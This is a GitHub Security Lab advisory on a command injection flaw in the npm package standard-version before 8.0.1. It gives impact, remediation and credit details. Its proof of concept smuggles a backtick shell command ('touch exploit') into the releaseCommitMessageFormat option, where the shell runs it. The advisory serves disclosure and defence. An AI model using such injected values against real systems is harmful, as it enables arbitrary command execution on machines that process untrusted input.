GHSA-7xcx-6wjh-7xp2 – standard-version
Package
Manager: npm
Name: standard-version
Vulnerable Version: >=0 <8.0.1
Severity
Level: Medium
CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N/E:H/RL:U/RC:C
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N
EPSS: N/A (percentile: N/A)
Details
Command Injection in standard-version

# GitHub Security Lab (GHSL) Vulnerability Report: `GHSL-2020-111`

The [GitHub Security Lab](https://securitylab.github.com) team has identified a potential security vulnerability in [standard-version](https://github.com/conventional-changelog/standard-version).

## Summary

The `standardVersion` function has a command injection vulnerability: as the proof of concept below shows, a shell command substitution placed in the `releaseCommitMessageFormat` option is executed when the release commit is made. Clients of the `standard-version` library are unlikely to be aware of this, so they might unwittingly write code that passes untrusted input into this option.

## Product

Standard Version

## Tested Version

Commit [2f04ac8](https://github.com/conventional-changelog/standard-version/tree/2f04ac8fc1c134a1981c23a093d4eece77d0bbb9/)

## Details

### Issue 1: Command injection in `standardVersion`

The following proof-of-concept illustrates the vulnerability. First install Standard Version and create an empty git repo to run the PoC in. Note that `npm install standard-version` fetches the latest release; to reproduce the issue, install a release below 8.0.1, since 8.0.1 and later are fixed:

```
npm install standard-version   # pick a release below 8.0.1 to reproduce
git init
echo "foo" > foo.txt           # the git repo has to be non-empty
git add foo.txt
git commit -am "initial commit"
```

Now create a file named `test.js` with the following contents:

```
var fs = require("fs");

// setting up a bit of environment: a minimal package.json for standard-version to bump
fs.writeFileSync("package.json", '{"name": "foo", "version": "1.0.0"}');

const standardVersion = require('standard-version')

standardVersion({
  noVerify: true,                                    // skip git hooks so nothing blocks the commit
  infile: 'foo.txt',                                 // file the changelog is written to; must exist in the repo
  releaseCommitMessageFormat: "bla `touch exploit`"  // the backticks are evaluated by the shell that runs the commit
})
```

and run it:

```
node test.js
```

Notice that a file named `exploit` has been created: the backtick expression in the commit message format was evaluated by the shell rather than committed as literal text. This vulnerability is similar to command injection vulnerabilities that have been found in other JavaScript libraries. Here are some examples: [CVE-2020-7646](https://github.com/advisories/GHSA-m8xj-5v73-3hh8), [CVE-2020-7614](https://github.com/advisories/GHSA-426h-24vj-qwxf), [CVE-2020-7597](https://github.com/advisories/GHSA-5q88-cjfq-g2mh), [CVE-2019-10778](https://github.com/advisories/GHSA-4gp3-p7ph-x2jr), [CVE-2019-10776](https://github.com/advisories/GHSA-84cm-v6jp-gjmr), [CVE-2018-16462](https://github.com/advisories/GHSA-9jm3-5835-537m), [CVE-2018-16461](https://github.com/advisories/GHSA-7g2w-6r25-2j7p), [CVE-2018-16460](https://github.com/advisories/GHSA-cfhg-9x44-78h2), [CVE-2018-13797](https://github.com/advisories/GHSA-pp57-mqmh-44h7), [CVE-2018-3786](https://github.com/advisories/GHSA-c9j3-wqph-5xx9), [CVE-2018-3772](https://github.com/advisories/GHSA-wjr4-2jgw-hmv8), [CVE-2018-3746](https://github.com/advisories/GHSA-3pxp-6963-46r9), [CVE-2017-16100](https://github.com/advisories/GHSA-jcw8-r9xm-32c6), [CVE-2017-16042](https://github.com/advisories/GHSA-qh2h-chj9-jffq).

We have written a [CodeQL](https://codeql.com) query, which automatically detects this vulnerability. You can see the results of the query on the `standard-version` project [here](https://lgtm.com/query/237522640229151035/).

#### Impact

This issue may lead to arbitrary command execution on the machine running `standard-version` if a client of the library calls the vulnerable method with untrusted input (for example, a commit message format taken from a configuration file or request that an attacker can influence).

#### Remediation

We recommend not using an API that can interpret a string as a shell command. For example, use [`child_process.execFile`](https://nodejs.org/api/child_process.html#child_process_child_process_execfile_file_args_options_callback) instead of [`child_process.exec`](https://nodejs.org/api/child_process.html#child_process_child_process_exec_command_options_callback). With `execFile` the program name and each argument are passed separately and no shell is spawned, so backticks, `$(...)`, `;` and `|` inside the commit message are treated as data rather than as syntax.

## Credit

This issue was discovered and reported by GitHub Engineer [@erik-krogh (Erik Krogh Kristensen)](https://github.com/erik-krogh).
## Contact

You can contact the GHSL team at `securitylab@github.com`, please include `GHSL-2020-111` in any communication regarding this issue.

## Disclosure Policy

This report is subject to our [coordinated disclosure policy](https://securitylab.github.com/disclosures#policy).
Metadata
Created: 2020-07-13T21:34:59Z
Modified: 2021-09-22T21:03:04Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/07/GHSA-7xcx-6wjh-7xp2/GHSA-7xcx-6wjh-7xp2.json
CWE IDs: ["CWE-77"]
Alternative ID: N/A
Finding: F422
Auto approve: 1